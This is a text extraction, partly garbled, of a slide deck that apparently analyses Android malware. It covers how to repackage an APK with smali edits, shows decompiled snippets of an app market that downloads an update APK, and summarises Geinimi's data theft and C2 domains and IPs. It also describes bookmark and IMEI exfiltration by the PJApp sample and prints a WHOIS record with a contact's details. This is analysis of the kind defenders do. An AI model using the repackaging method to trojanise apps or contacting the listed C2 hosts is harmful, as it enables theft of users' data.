apk explorer2

14
恶恶恶恶 Apk Explorer Series .2 1

Upload: feng-xiaoping

Post on 22-Nov-2014

423 views

Category:

Documents


4 download

DESCRIPTION

 

TRANSCRIPT

Page 1: Apk explorer2

1

恶意软件Apk Explorer Series .2

Page 2: Apk explorer2

2

恶意软件@Android

Page 3: Apk explorer2

3

Nduo

N多做的

ApkApkNduo Apk

Page 4: Apk explorer2

4

如何实现

.apk

• Unzip

.dex

• Decompile• ApkTool[1]

• Dex2Jar[2]

.smali

• Modify• Smali[4]

new.apk

• Repack• ApkTool

Page 5: Apk explorer2

5

Wet feet

AlertDialog alertDialog = new AlertDialog.Builder(this).create();alertDialog.setTitle("LALALA");alertDialog.setMessage("You should see me!!!!!!!");alertDialog.show();

AlertDialog Java Code

Page 6: Apk explorer2

6

Wet feet cont.

new-instance v1, Landroid/app/AlertDialog$Builder;

#v1=(UninitRef);

invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V #v1=(Reference);

invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog; move-result-object v0

.local v0, alertDialog:Landroid/app/AlertDialog; #v0=(Reference);

const-string v1, "LALALA" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V

const-string v1, "You should see me!!!!!!!" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V

invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V

new-instance v1, Landroid/app/AlertDialog$Builder; #v1=(UninitRef); invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V #v1=(Reference); invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog; move-result-object v0

.local v0, alertDialog:Landroid/app/AlertDialog; #v0=(Reference); const-string v1, "LALALA" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V const-string v1, "You should see me!!!!!!!" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V

invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V

AlertDialog Op-code

Page 7: Apk explorer2

7

Wet feet cont..method public onCreate(Landroid/os/Bundle;)V .locals 12 .parameter "savedInstanceState" .prologue const/16 v11, 0x400

Yingyonghui Java code

SplashActivity.java

#v11=(PosShort); const/4 v10, 0x0

#v10=(Null); const/4 v9, 0x1

#v9=(One); invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

AlertDialog Op-code

Page 8: Apk explorer2

8

HideFile Java code

HideFiles.java

Wet feet cont.getPackageInfo("com.nduoa.market", 0);

(“使用N多市场, \n帮助维护「%s」的更

新?” , …)

localBuilder2.setPositiveButton("安装 ",

locald);

a.a("http://market.nduoa.com/update/nDuoaMarket.apk", str2);

i.a("KAWAHAeBUBLBaBBAMAPBRAEAIAWAMBdAKBbALAUABBCABBOAABdAQANAeABBaANAaABAOBPBTAGACBOATBDBAB");

Page 9: Apk explorer2

9

Geinimi[6]

Page 10: Apk explorer2

10

Geinimi cont.

www.widifu.comwww.udaore.com

www.frijd.comwww.islpast.comwww.piajesj.comwww.qoewsl.comwww.weolir.comwww.uisoa.comwww.riusdu.comwww.aiucr.com

117.135.134.185180.168.68.34

Geinimi

Access the user's geo-location based on coordinates given by the GPSSend or receive SMS messagesAccess the user's mailboxRead and modify the user's phonebook contactsRead and modify the user's browsing historyCheck running processes in memoryTerminate legitimate running process in the deviceInstall shortcutsPerform web queriesChange the wallpaper of the device

BoardBrandCPIDCPU ABIDeviceDIDDisplayFingerprintHostLine1 NumberManufacturerModelNetwork Country ISONetwork OperatorNetwork Operator NameNetwork TypePhone TypeProduct

PTIDSALESIDSDK versionShellSIM Country ISOSIM OperatorSIM Operator NameSIM Serial NumberSIM StateSoftware VersionSubscriber IDTagsTimeTypeUserVoice mail Number

Page 11: Apk explorer2

11

PJApp 泡椒 [3][5]

"content://browser/bookmarks"

MEEG

O91.C

OM

渠道激活

IMEI / SIM / IMSI / ICCIDPdus……

Default Browser

SEND ALL Bookmarks

ADDandroid.paojiao.cnct2.paojiao.cng3g3.cn

com.uc.browsercom.tencent.mttcom.opera.mini.androidmobi.mgeek.TunnyBrowsercom.skyfire.browsercom.kolbysoft.steelcom.android.browser

Page 12: Apk explorer2

12

MEEGO91.COMRegistrant:nduo deminanchang jiangxi sicA501nanchang, jiangxi 444001China

Registered through: GoDaddy.comCreated on: 05-Sep-10Expires on: 05-Sep-11

Administrative Contact:demi, nduo [email protected] jiangxi sicA501nanchang, jiangxi 444001China+86.861363345678

Page 14: Apk explorer2

14

Question ?